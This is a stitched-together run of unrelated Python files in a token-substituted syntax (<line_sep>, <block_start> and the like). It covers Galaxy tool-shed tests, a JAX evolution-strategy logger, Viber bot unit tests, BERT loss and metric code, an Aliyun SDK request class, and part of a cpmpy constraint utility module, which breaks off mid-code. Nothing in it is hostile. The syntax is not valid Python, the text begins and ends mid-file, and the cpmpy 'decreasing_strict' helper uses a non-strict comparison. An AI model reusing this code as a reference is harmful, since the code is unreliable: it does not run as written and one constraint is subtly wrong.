'''<line_sep>self.galaxy_login(email=common.admin_email username=common.admin_username)<line_sep>post_submit_strings_displayed=[data_manager_repository_name]<line_sep>self.install_repository(data_manager_repository_name common.test_user_1_name category_name install_tool_dependencies=<true> post_submit_strings_displayed=post_submit_strings_displayed)<block_end><def_stmt>test_0030_verify_data_manager_tool self<block_start>'''Verify that the data_manager_1460 repository is installed and Data Manager tool appears in list in Galaxy.'''<line_sep>repository=self.test_db_util.get_installed_repository_by_name_owner(data_manager_repository_name common.test_user_1_name)<line_sep>strings_displayed=['status' 'jobs' data_manager_name]<line_sep>self.display_installed_jobs_list_page(repository data_manager_names=data_manager_name strings_displayed=strings_displayed)<block_end><def_stmt>test_0040_verify_data_manager_data_table self<block_start>'''Verify that the installed repository populated shed_tool_data_table.xml and the sample files.'''<line_sep>self.verify_installed_repository_data_table_entries(required_data_table_entries=['data_manager_test_data_table'])<block_end><block_end>
<import_stmt>pickle<import_stmt>jax<import_stmt>jax.numpy<as>jnp<import_stmt>chex<import_from_stmt>functools partial<class_stmt>ESLog(object)<block_start><def_stmt>__init__ self num_dims:int num_generations:int top_k:int maximize:bool<block_start>"""Simple jittable logging tool for ES rollouts."""<line_sep>self.num_dims=num_dims<line_sep>self.num_generations=num_generations<line_sep>self.top_k=top_k<line_sep>self.maximize=maximize<block_end>@partial(jax.jit static_argnums=(0 ))<def_stmt>initialize self<arrow>chex.ArrayTree<block_start>"""Initialize the logger storage."""<line_sep>log={"top_fitness":jnp.zeros(self.top_k)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "top_params":jnp.zeros((self.top_k self.num_dims))-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_top_1":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_top_mean":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_top_std":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_gen_1":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_gen_mean":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_gen_std":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "gen_counter":0 }<line_sep><return>log<block_end># @partial(jax.jit, static_argnums=(0,)) <def_stmt>update self log:chex.ArrayTree x:chex.Array fitness:chex.Array<arrow>chex.ArrayTree<block_start>"""Update the logging storage with newest data."""<line_sep># Check if there are solutions better than current archive vals=jnp.hstack([log["top_fitness"] fitness])<line_sep>params=jnp.vstack([log["top_params"] x])<line_sep>top_idx=(self.maximize<times>((-1)<times>vals).argsort()+((1-self.maximize)<times>vals).argsort())<line_sep>log["top_fitness"]=vals[top_idx[:self.top_k]]<line_sep>log["top_params"]=params[top_idx[:self.top_k]]<line_sep>log["log_top_1"]=(log["log_top_1"].at[log["gen_counter"]].set(log["top_fitness"][0]))<line_sep>log["log_top_mean"]=(log["log_top_mean"].at[log["gen_counter"]].set(jnp.mean(log["top_fitness"])))<line_sep>log["log_top_std"]=(log["log_top_std"].at[log["gen_counter"]].set(jnp.std(log["top_fitness"])))<line_sep>log["log_gen_1"]=(log["log_gen_1"].at[log["gen_counter"]].set(self.maximize<times>jnp.max(fitness)+(1-self.maximize)<times>jnp.min(fitness)))<line_sep>log["log_gen_mean"]=(log["log_gen_mean"].at[log["gen_counter"]].set(jnp.mean(fitness)))<line_sep>log["log_gen_std"]=(log["log_gen_std"].at[log["gen_counter"]].set(jnp.std(fitness)))<line_sep>log["gen_counter"]<augadd>1<line_sep><return>log<block_end><def_stmt>save self log:chex.ArrayTree filename:str<block_start>"""Save different parts of logger in .pkl file."""<with_stmt>open(filename "wb")<as>handle<block_start>pickle.dump(log handle protocol=pickle.HIGHEST_PROTOCOL)<block_end><block_end><def_stmt>load self filename:str<block_start>"""Reload the pickle logger and return dictionary."""<with_stmt>open(filename "rb")<as>handle<block_start>es_logger=pickle.load(handle)<block_end><return>es_logger<block_end><def_stmt>plot self log title ylims=<none> fig=<none> ax=<none> no_legend=<false> <block_start>"""Plot fitness trajectory from evo logger over generations."""<import_stmt>matplotlib.pyplot<as>plt<if_stmt>fig<is><none><or>ax<is><none><block_start>fig,ax=plt.subplots(1 1 figsize=(6 3))<block_end>int_range=jnp.arange(1 
log["gen_counter"]+1)<line_sep>ax.plot(int_range log["log_top_1"][:log["gen_counter"]] label="Top 1")<line_sep>ax.plot(int_range log["log_top_mean"][:log["gen_counter"]] label=f"Top-{self.top_k} Mean" )<line_sep>ax.plot(int_range log["log_gen_1"][:log["gen_counter"]] label="Gen. 1")<line_sep>ax.plot(int_range log["log_gen_mean"][:log["gen_counter"]] label="Gen. Mean" )<if_stmt>ylims<is><not><none><block_start>ax.set_ylim(ylims)<block_end><if_stmt><not>no_legend<block_start>ax.legend()<block_end><if_stmt>title<is><not><none><block_start>ax.set_title(title)<block_end>ax.set_xlabel("Number of Generations")<line_sep>ax.set_ylabel("Fitness Score")<line_sep>ax.spines["top"].set_visible(<false>)<line_sep>ax.spines["right"].set_visible(<false>)<line_sep><return>fig ax<block_end><block_end>
<import_stmt>logging<import_stmt>unittest.mock<import_from_stmt>viberbot Api<import_from_stmt>viberbot.api.user_profile UserProfile<import_from_stmt>viberbot.api.viber_requests ViberConversationStartedRequest<import_from_stmt>viberbot.api.viber_requests ViberFailedRequest<import_from_stmt>viberbot.api.viber_requests ViberMessageRequest<import_from_stmt>viberbot.api.viber_requests ViberSubscribedRequest<import_from_stmt>viberbot.api.viber_requests ViberUnsubscribedRequest<import_from_stmt>programy.clients.restful.flask.viber.client ViberBotClient<import_from_stmt>programy.clients.restful.flask.viber.config ViberConfiguration<import_from_stmt>programy.clients.render.text TextRenderer<import_from_stmt>programytest.clients.arguments MockArgumentParser<class_stmt>MockViberApi(Api)<block_start><def_stmt>__init__ self configuration request=<none> verified=<true><block_start>self._logger=logging.getLogger()<line_sep>self._messages=[]<line_sep>self._request=request<line_sep>self._verified=verified<block_end><def_stmt>set_webhook self url webhook_events=<none> is_inline=<false><block_start><pass><block_end><def_stmt>send_messages self to messages chat_id=<none><block_start>self._messages=messages<block_end><def_stmt>verify_signature self request_data signature<block_start><return>self._verified<block_end><def_stmt>parse_request self request_data<block_start><if_stmt>self._request<is><none><block_start>super(MockViberApi self).parse_request(request_data)<block_end><return>self._request<block_end><block_end><class_stmt>MockViberBotClient(ViberBotClient)<block_start><def_stmt>__init__ self argument_parser=<none> viber_client=<none><block_start>self.test_viber_client=viber_client<line_sep>self.test_question=<none><line_sep>ViberBotClient.__init__(self argument_parser)<block_end><def_stmt>parse_configuration self<block_start>self.configuration.client_configuration._name="ViberBot"<line_sep>self.configuration.client_configuration._avatar="viber.svg"<line_sep>self.configuration.client_configuration._webhook="http://localhost/webhook"<block_end><def_stmt>set_question self question<block_start>self.test_question=question<block_end><def_stmt>get_license_keys self<block_start>self._viber_token="VIBER_TOKEN"<block_end><def_stmt>ask_question self sessionid question<block_start><if_stmt>self.test_question<is><not><none><block_start><return>self.test_question<block_end><return>super(MockViberBotClient self).ask_question(sessionid question)<block_end><def_stmt>create_viber_api self configuration<block_start><return>MockViberApi(configuration)<block_end><def_stmt>create_viber_bot self viber_token<block_start><if_stmt>self.test_viber_client<is><not><none><block_start><return>self.test_viber_client<block_end><return>super(MockViberBotClient self).create_viber_bot(viber_token)<block_end><block_end><class_stmt>ViberBotClientTests(unittest.TestCase)<block_start><def_stmt>test_viber_client_init self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments)<line_sep>self.assertIsNotNone(client)<line_sep>self.assertEqual("VIBER_TOKEN" client._viber_token)<line_sep>self.assertIsNotNone(client._viber_bot)<line_sep>self.assertIsInstance(client.get_client_configuration() ViberConfiguration)<line_sep>self.assertIsInstance(client._viber_bot Api)<line_sep>self.assertFalse(client._render_callback())<line_sep>self.assertIsInstance(client.renderer TextRenderer)<block_end><def_stmt>test_create_viber_bot_no_token 
self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments)<line_sep>self.assertIsNotNone(client)<line_sep>bot=client.create_viber_bot(<none>)<line_sep>self.assertIsNone(bot)<block_end><def_stmt>test_create_viber_bot_no_name self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments)<line_sep>self.assertIsNotNone(client)<line_sep>client.configuration.client_configuration._name=<none><line_sep>bot=client.create_viber_bot("TOKEN")<line_sep>self.assertIsNone(bot)<block_end><def_stmt>test_create_viber_bot_no_avatar self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments)<line_sep>self.assertIsNotNone(client)<line_sep>client.configuration.client_configuration._avatar=<none><line_sep>bot=client.create_viber_bot("TOKEN")<line_sep>self.assertIsNone(bot)<block_end><def_stmt>test_create_viber_bot_no_webhook self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments)<line_sep>self.assertIsNotNone(client)<line_sep>client.configuration.client_configuration._webhook=<none><line_sep>bot=client.create_viber_bot("TOKEN")<line_sep>self.assertIsNone(bot)<block_end><def_stmt>test_handle_message_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=ViberMessageRequest()<line_sep>request._message="Hello"<line_sep>request._sender=UserProfile(user_id="User123")<line_sep>client.test_question="Hi there"<line_sep>client.handle_message_request(request)<line_sep>self.assertIsNotNone(client.test_viber_client)<line_sep>self.assertIsNotNone(client.test_viber_client._messages)<line_sep>self.assertEqual(1 len(client.test_viber_client._messages))<line_sep>self.assertEqual("Hi there" client.test_viber_client._messages[0].text)<block_end><def_stmt>test_handle_subscribed_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=ViberSubscribedRequest()<line_sep>request._user=UserProfile(user_id="User123")<line_sep>client.handle_subscribed_request(request)<line_sep>self.assertIsNotNone(client.test_viber_client)<line_sep>self.assertIsNotNone(client.test_viber_client._messages)<line_sep>self.assertEqual(1 len(client.test_viber_client._messages))<line_sep>self.assertEqual("Thanks for subscribing!" 
client.test_viber_client._messages[0].text)<block_end><def_stmt>test_handle_unsubscribed_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=ViberUnsubscribedRequest()<line_sep>request._user_id="User123"<line_sep>client.handle_unsubscribed_request(request)<block_end><def_stmt>test_handle_conversation_started_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=ViberConversationStartedRequest()<line_sep>request._user=UserProfile(user_id="User123")<line_sep>client.handle_conversation_started_request(request)<block_end><def_stmt>test_handle_failed_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=ViberFailedRequest()<line_sep>request._user_id="User123"<line_sep>request._desc="Whoops, I know nothing!"<line_sep>client.handle_failed_request(request)<block_end><def_stmt>test_handle_unknown_request self<block_start>arguments=MockArgumentParser()<line_sep>client=MockViberBotClient(arguments viber_client=MockViberApi(<none>))<line_sep>self.assertIsNotNone(client)<line_sep>request=unittest.mock.Mock()<line_sep>client.handle_unknown_request(request)<block_end><def_stmt>test_receive_message self<block_start>arguments=MockArgumentParser()<line_sep>viber_api=MockViberApi(<none>)<line_sep>client=MockViberBotClient(arguments viber_client=viber_api)<line_sep>self.assertIsNotNone(client)<line_sep>request=unittest.mock.Mock()<line_sep>request.get_data.return_value="{}"<line_sep>request.headers={"X-Viber-Content-Signature":"SIGNATURE"}<line_sep>return_request=ViberMessageRequest()<line_sep>return_request._message="Hello"<line_sep>return_request._sender=UserProfile(user_id="User123")<line_sep>viber_api._request=return_request<line_sep>client.receive_message(request)<block_end><block_end>
"""Base class for models working with bert."""<import_from_stmt>typing Callable Dict Optional Tuple Union<import_from_stmt>flax.training common_utils<import_stmt>jax<import_stmt>jax.numpy<as>jnp<import_stmt>numpy<as>np<import_from_stmt>scenic.model_lib.base_models base_model<import_from_stmt>scenic.model_lib.base_models model_utils<line_sep># Aliases for custom types: Batch=Dict[str jnp.ndarray]<line_sep>MetricFn=Callable[[Dict[str jnp.ndarray] Batch] Dict[str Tuple[float int]]]<line_sep>LossFn=Callable[[Dict[str jnp.ndarray] Batch Optional[jnp.ndarray]] float]<def_stmt>num_examples logits:jnp.ndarray weights:Optional[jnp.ndarray]=<none><arrow>Union[jnp.ndarray int]<block_start><if_stmt>weights<is><none><block_start><return>logits.shape[0]<block_end><return>weights.sum()<block_end><def_stmt>sparse_weighted_unnormalized_softmax_cross_entropy logits:jnp.ndarray labels:jnp.ndarray mlm_weights:jnp.ndarray batch_mask_weights:Optional[jnp.ndarray]=<none><arrow>jnp.ndarray<block_start>"""Computes sparse weighted softmax cross entropy give logits and targets. Args: logits: Logits of shape [batch_size, length, vocab_size]. labels: Labels from {0 ... vocab_size - 1} of shape [batch_size, length]. mlm_weights: Weights of shape [batch_size, length], indicating masked tokens in masked language modeling task. batch_mask_weights: None or array of shape [batch,] indicating masked examples. Returns: Per example Loss value. """<line_sep>batch_size,length,vocab_size=logits.shape<line_sep>logits=jax.nn.log_softmax(logits)<line_sep>logits,mlm_weights=logits.ravel() mlm_weights.ravel()<line_sep>offsets=(np.arange(batch_size<times>length)<times>vocab_size).reshape((-1 length))<line_sep>labels=(labels+offsets).ravel()<line_sep>loss=-jnp.take(logits labels axis=0)<line_sep>loss=loss<times>mlm_weights<line_sep>loss=loss.sum(axis=-1)/(mlm_weights.sum(axis=-1)+1e-8)<if_stmt>batch_mask_weights<is><not><none><block_start>loss=model_utils.apply_weights(loss batch_mask_weights)<block_end><return>loss<block_end><def_stmt>sparse_weighted_softmax_cross_entropy logits:jnp.ndarray labels:jnp.ndarray mlm_weights:jnp.ndarray batch_mask_weights:Optional[jnp.ndarray]=<none><arrow>jnp.ndarray<block_start>"""Same as weighted_unnormalized, but additionally takes a mean. Args: logits: Logits of shape [batch_size, length, vocab_size]. labels: Labels from {0 ... vocab_size - 1} of shape [batch_size, length]. mlm_weights: Weights of shape [batch_size, length], indicating masked tokens in masked language modeling task. batch_mask_weights: None or array of shape [batch,] indicating masked examples. Returns: The mean cross entropy of the examples in the given batch as a scalar. """<if_stmt>batch_mask_weights<is><not><none><block_start>normalization=batch_mask_weights.sum()<block_end><else_stmt><block_start>normalization=mlm_weights.shape[0]# Batch size. <block_end>sparse_unnormalized_softmax_ce=sparse_weighted_unnormalized_softmax_cross_entropy(logits labels mlm_weights batch_mask_weights)<line_sep><return>jnp.sum(sparse_unnormalized_softmax_ce)/(normalization+1e-8)<block_end><def_stmt>sparse_weighted_per_example_accuracy logits:jnp.ndarray labels:jnp.ndarray mlm_weights:jnp.ndarray batch_mask_weights:Optional[jnp.ndarray]=<none><arrow>jnp.ndarray<block_start>"""Computes weighted number of correctly classified over the given batch. This computes the weighted number of correctly classified masked tokens in a single, potentially padded minibatch. 
If the minibatch/inputs is padded (i.e., it contains null examples/pad pixels) it is assumed that batch_mask_weights is a binary mask where 0 indicates that the example/pixel is null/padded. We assume the trainer will aggregate and divide by number of samples. Args: logits: Logits of shape [batch_size, length, vocab_size]. labels: Labels from {0 ... vocab_size - 1} of shape [batch_size, length]. mlm_weights: Weights of shape [batch_size, length], indicating masked tokens in masked language modeling task. batch_mask_weights: None or array of shape [batch,] indicating masked examples. Returns: Per example accuracy of predicted masked tokens. """<line_sep>preds=jnp.argmax(logits axis=-1)<line_sep>correct=jnp.equal(preds labels)<line_sep>correct=correct<times>mlm_weights<line_sep># Shape of per example acccuracy will be (batch_size,). per_ex_accuracy=correct.sum(axis=-1)/(mlm_weights.sum(axis=-1)+1e-8)<if_stmt>batch_mask_weights<is><not><none><block_start>per_ex_accuracy=model_utils.apply_weights(per_ex_accuracy batch_mask_weights)<block_end><return>per_ex_accuracy<block_end><def_stmt>bert_metrics_function outputs:Dict[str jnp.ndarray] batch:Batch<arrow>Dict[str Tuple[float int]]<block_start>"""Calcualte metrics for the BERT task. Args: outputs: Output of model that has masked LM logits of shape [batch, length, vocab_size], and next sentence prediction logits of shape [batch, 2]. batch: Batch of data that has 'masked_lm_ids', 'masked_lm_weights' and 'next_sentence_labels'. Returns: A dict of metrics, in which keys are metrics name and values are tuples of (metric, normalizer). """<line_sep>mlm_logits=outputs['mlm_logits']<line_sep>nsp_logits=outputs['nsp_logits']<line_sep>next_sentence_labels=common_utils.onehot(batch['next_sentence_labels'] 2)<line_sep>batch_weights=batch.get('batch_mask')# batch_mask might not be defined per_ex_nsp_loss=model_utils.weighted_unnormalized_softmax_cross_entropy(nsp_logits next_sentence_labels batch_weights)<line_sep>per_ex_nsp_accuracy=model_utils.weighted_correctly_classified(nsp_logits next_sentence_labels batch_weights)<line_sep>per_ex_mlm_loss=sparse_weighted_unnormalized_softmax_cross_entropy(mlm_logits batch['masked_lm_ids'] batch['masked_lm_weights'] batch_weights)<line_sep>per_ex_mlm_accuracy=sparse_weighted_per_example_accuracy(mlm_logits batch['masked_lm_ids'] batch['masked_lm_weights'] batch_weights)<line_sep># This psum is required to correctly evaluate with multihost. Only host 0 # will report the metrics, so we must aggregate across all hosts. The psum # will map an array of shape [n_global_devices, batch_size] -> [batch_size] # by summing across the devices dimension. The outer sum then sums across the # batch dim. The result is then we have summed across all samples in the # sharded batch. evaluated_metrics={}<line_sep>normalizer=num_examples(mlm_logits batch_weights)<for_stmt>name,value zip(['nsp_loss' 'nsp_accuracy' 'mlm_loss' 'mlm_accuracy' 'loss'] [per_ex_nsp_loss per_ex_nsp_accuracy per_ex_mlm_loss per_ex_mlm_accuracy per_ex_nsp_loss+per_ex_mlm_loss])<block_start>evaluated_metrics[name]=model_utils.psum_metric_normalizer((value normalizer))<block_end><return>evaluated_metrics<block_end><def_stmt>compute_bert_loss mlm_logits:jnp.ndarray nsp_logits:jnp.ndarray batch:Batch<arrow>float<block_start>"""Computes BERT loss. Args: mlm_logits: Masked LM logits of shape [batch, length, vocab_size]. nsp_logits: Next sentence prediction logits of shape [batch, 2]. 
batch: Batch of data that has 'masked_lm_ids', 'masked_lm_weights' and 'next_sentence_labels'. Returns: Loss value. """<line_sep>next_sentence_labels=common_utils.onehot(batch['next_sentence_labels'] 2)<line_sep>batch_weights=batch.get('batch_mask')# batch_mask might not be defined nsp_loss=model_utils.weighted_softmax_cross_entropy(nsp_logits next_sentence_labels batch_weights)<line_sep>mlm_loss=sparse_weighted_softmax_cross_entropy(mlm_logits batch['masked_lm_ids'] batch['masked_lm_weights'] batch_weights)<line_sep><return>nsp_loss+mlm_loss<block_end><class_stmt>BERTBaseModel(base_model.BaseModel)<block_start>"""Defines BERT base models. A model is class with three members: get_metrics_fn, loss_fn, and a flax_model. get_metrics_fn returns a callable function, metric_fn, that calculates the metrics and returns a dictionary. The metric function computes f(x_i, y_i) on a minibatch, it has API: ```metric_fn(logits, label, weights).``` The trainer will then aggregate and compute the mean across all samples evaluated. loss_fn is a function of API loss = loss_fn(logits, batch, model_params=None). This model class defines a softmax_cross_entropy_loss with weight decay, where the weight decay factor is determined by config.l2_decay_factor. flax_model is returned from the build_flax_model function. A typical usage pattern will be: ``` model_cls = bert_model.BERTModel model = model_cls(config, dataset.meta_data) flax_model = model.build_flax_model dummy_input = {name: jnp.zeros(input_shape, model_input_dtype), ...} model_state, params = flax_model.init( rng, dummy_input, train=False).pop('params') ``` And this is how to call the model:s ``` variables = {'params': params, **model_state} output, new_model_state = flax_model.apply(variables, inputs, ...) ``` """<def_stmt>get_metrics_fn self split:Optional[str]=<none><arrow>MetricFn<block_start>"""Returns a callable metric function for the model. Args: split: The split for which we calculate the metrics. It should be one of the ['train', 'validation', 'test']. Returns: A metric function with the following API: ```metrics_fn(outputs, batch)``` """<del_stmt>split# For all splits, we return the same metric functions. <return>bert_metrics_function<block_end><def_stmt>loss_function self outputs:Dict[str jnp.ndarray] batch:Batch model_params:Optional[jnp.ndarray]=<none><arrow>float<block_start>"""Returns softmax cross entropy loss with an L2 penalty on the weights. Args: outputs: a dictionary containing either 'logits' key of shape [batch, length, num_classes] or 'nsp_logits' of shape [batch, 2] and 'mlm_logits' of shape [batch, length, vocab_size] (for 'BERT' task). batch: Batch of data that has 'label' and optionally 'batch_mask'. model_params: Parameters of the model, for optionally applying regularization. Returns: Total loss. """<line_sep>total_loss=compute_bert_loss(outputs['mlm_logits'] outputs['nsp_logits'] batch)<if_stmt>self.config.get('l2_decay_factor')<block_start>l2_loss=model_utils.l2_regularization(model_params)<line_sep>total_loss<augadd>0.5<times>self.config.l2_decay_factor<times>l2_loss<block_end><return>total_loss<block_end><def_stmt>build_flax_model self<block_start><raise>NotImplementedError('Subclasses must implement build_flax_model().')<block_end><def_stmt>default_flax_model_config self<block_start>"""Default config for the flax model that is built in `build_flax_model`. 
This function in particular serves the testing functions and is supposed to provide the config that is passed to the flax_model when it is built in the `build_flax_model` function, e.g., `model_dtype_str`. """<line_sep><raise>NotImplementedError('Subclasses must implement default_flax_model_config().')<block_end><block_end>
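The flat-offset gather inside sparse_weighted_unnormalized_softmax_cross_entropy is the least obvious step, so here is a short, self-contained numerical check (a sketch for illustration only, not part of the library) confirming that it selects the log-probability of each label token, i.e. that it agrees with a plain take_along_axis gather.

import jax
import jax.numpy as jnp
import numpy as np

batch_size, length, vocab_size = 2, 3, 5
rng = np.random.default_rng(0)
logits = jnp.asarray(rng.normal(size=(batch_size, length, vocab_size)))
labels = jnp.asarray(rng.integers(0, vocab_size, size=(batch_size, length)))

logprobs = jax.nn.log_softmax(logits)

# Flat-offset gather, exactly as in the loss above.
offsets = (np.arange(batch_size * length) * vocab_size).reshape((-1, length))
flat = -jnp.take(logprobs.ravel(), (labels + offsets).ravel(), axis=0)

# Reference: gather each label's log-probability along the vocab axis.
ref = -jnp.take_along_axis(logprobs, labels[..., None], axis=-1).squeeze(-1).ravel()

assert np.allclose(flat, ref)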
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_from_stmt>aliyunsdkcore.request RpcRequest<class_stmt>DescribeFileRequest(RpcRequest)<block_start><def_stmt>__init__ self<block_start>RpcRequest.__init__(self 'cloudmarketing' '2018-09-10' 'DescribeFile')<line_sep>self.set_method('POST')<block_end><def_stmt>get_FileName self<block_start><return>self.get_query_params().get('FileName')<block_end><def_stmt>set_FileName self FileName<block_start>self.add_query_param('FileName' FileName)<block_end><def_stmt>get_DataSchemaStatusLists self<block_start><return>self.get_query_params().get('DataSchemaStatusLists')<block_end><def_stmt>set_DataSchemaStatusLists self DataSchemaStatusLists<block_start><for_stmt>depth1 range(len(DataSchemaStatusLists))<block_start><if_stmt>DataSchemaStatusLists[depth1]<is><not><none><block_start>self.add_query_param('DataSchemaStatusList.'+str(depth1+1) DataSchemaStatusLists[depth1])<block_end><block_end><block_end><def_stmt>get_PageNo self<block_start><return>self.get_query_params().get('PageNo')<block_end><def_stmt>set_PageNo self PageNo<block_start>self.add_query_param('PageNo' PageNo)<block_end><def_stmt>get_PageSize self<block_start><return>self.get_query_params().get('PageSize')<block_end><def_stmt>set_PageSize self PageSize<block_start>self.add_query_param('PageSize' PageSize)<block_end><def_stmt>get_FileId self<block_start><return>self.get_query_params().get('FileId')<block_end><def_stmt>set_FileId self FileId<block_start>self.add_query_param('FileId' FileId)<block_end><block_end>
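A minimal usage sketch for the request class above, assuming the standard aliyun-python-sdk-core AcsClient; the credentials, region, file name and status value are placeholders, not values from the source.

from aliyunsdkcore.client import AcsClient

# Placeholders -- substitute real credentials and region.
client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-hangzhou')

request = DescribeFileRequest()
request.set_FileName('audience_seed.csv')      # hypothetical file name
request.set_DataSchemaStatusLists(['NORMAL'])  # hypothetical status filter
request.set_PageNo(1)
request.set_PageSize(20)

response = client.do_action_with_exception(request)
print(response)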
""" This package includes my constraints/utilities/etc for cpmpy. This cpmpy model was written by <NAME> (<EMAIL>) See also my cpmpy page: http://hakank.org/cpmpy/ """<import_stmt>sys math re<import_stmt>itertools<import_stmt>numpy<as>np<import_from_stmt>functools reduce<import_from_stmt>cpmpy *<import_from_stmt>cpmpy.expressions.globalconstraints GlobalConstraint<import_from_stmt>cpmpy.solvers *<import_from_stmt>ortools.sat.python cp_model<as>ort<import_from_stmt>cpmpy.transformations.flatten_model flatten_constraint flatten_model<import_from_stmt>cpmpy.transformations.get_variables print_variables<def_stmt>AllDifferent_except_0 args<block_start>""" Ensure that all arguments that are != 0 must have distinct values. """<line_sep># Note: The parenthesis around (var1 != 0) are needed! <return>[((var1<ne>0)&(var2<ne>0)).implies(var1<ne>var2)<for>var1,var2 all_pairs(args)]<block_end><def_stmt>all_different_except_0 args<block_start>""" Alias for AllDifferent_except_0(args). """<line_sep><return>AllDifferent_except_0(args)<block_end><def_stmt>to_num a n base<block_start>""" to_num(a, n, base) Ensure that the digits in array `a` corresponds to the number `n` in base `base`. """<line_sep>tlen=len(a)<line_sep><return>n<eq>sum([(base<power>(tlen-i-1))<times>a[i]<for>i range(tlen)])<block_end><def_stmt>increasing args<block_start>""" Ensure that the values in args are increasing. """<line_sep><return>[args[i-1]<le>args[i]<for>i range(1 len(args))]<block_end><def_stmt>increasing_strict args<block_start>""" Ensure that the values in args are strict increasing. """<line_sep><return>[args[i-1]<l>args[i]<for>i range(1 len(args))]<block_end><def_stmt>decreasing args<block_start>""" Ensure that the values in args are decreasing. """<line_sep><return>[args[i-1]<ge>args[i]<for>i range(1 len(args))]<block_end><def_stmt>decreasing_strict args<block_start>""" Ensure that the values in args are strict decreasing. """<line_sep><return>[args[i-1]<ge>args[i]<for>i range(1 len(args))]<block_end><def_stmt>all_pairs args<block_start>""" Generate all pairs from the list of lists args. (stolen from cmppy/globalconstraints.py) """<line_sep><return>list(itertools.combinations(args 2))<block_end><def_stmt>get_different_solution m x<block_start>""" Add the current solution (x) in the model to generate other solutions. Usage: # ... ss = CPM_ortools(model) if ss.solve(): print(x.value()) get_different_solution(ss, x) Note: The array in x must be a flattened array. If there are many decision variables, use flatten_lists(a) to flatten out the array. E.g. # ... ss = CPM_ortools(model) while ss.solve(): print(x.value()) # an array print(y.value()) # a variable print(z.value()) # another variable get_different_solution(ss,flatten_lists([x,[y,z]]) Note that this might be slow for larger models or models with many solutions. If so, try to use - ortools_wrapper() or the simple solution printers such as - ORT_simple_printer - ORT_arrays_printer - ORT_simple_printer_matrix - ORT_simple_function_printer or define a similiar solution printer. """<line_sep># n = len(x) # m += [any([x[i].value() != x[i] for i in range(n)])] m<augadd>[any([t.value()<ne>t<for>t x])]<block_end><def_stmt>flatten_lists a<block_start>""" Flatten a list of lists. Note: a must be an array of arrays (list of lists). See get_different_solution for examples. """<line_sep><return>[item<for>sublist a<for>item sublist]<block_end><class_stmt>ORT_simple_printer(ort.CpSolverSolutionCallback)<block_start>""" A simple printer callback for single array printing. 
"""<def_stmt>__init__ self varmap a num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1# I always start at 1. :-) # populate values before printing # For array of arrays (Tias' original) # for wm in self.vars: # for cpm_var in wm: # cpm_var._value = self.Value(self.varmap[cpm_var]) # For single arrays: <for_stmt>cpm_var self.vars<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end>(a)=self.vars<line_sep>print(f"#{self.solcount}: {a.value()}")<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><class_stmt>ORT_arrays_printer(ort.CpSolverSolutionCallback)<block_start>""" A simple printer callback for array of arrays. """<def_stmt>__init__ self varmap a num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1# I always start at 1. :-) # populate values before printing # For array of arrays (Tias' original) <for_stmt>wm self.vars<block_start><for_stmt>cpm_var wm<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end><block_end># For single arrays: <for_stmt>cpm_var self.vars<block_start>cpm_var._value=self.Value(self.varmap[cpm_var])<block_end>(a)=self.vars<line_sep>print(f"#{self.solcount}: {a.value()}")<if_stmt>self.num_solutions<g>0<and>self.solcount<ge>self.num_solutions<block_start>self.StopSearch()<block_end><block_end><block_end><class_stmt>ORT_simple_printer_matrix(ort.CpSolverSolutionCallback)<block_start>""" A simple printer callback for printing a matrix. """<def_stmt>__init__ self varmap a rows cols num_solutions=0<block_start>super().__init__()<line_sep>self.solcount=0<line_sep>self.varmap=varmap<line_sep>self.vars=(a)<line_sep>self.rows=rows<line_sep>self.cols=cols<line_sep>self.num_solutions=num_solutions<block_end><def_stmt>on_solution_callback self<block_start>self.solcount<augadd>1<for_stmt>cpm_var 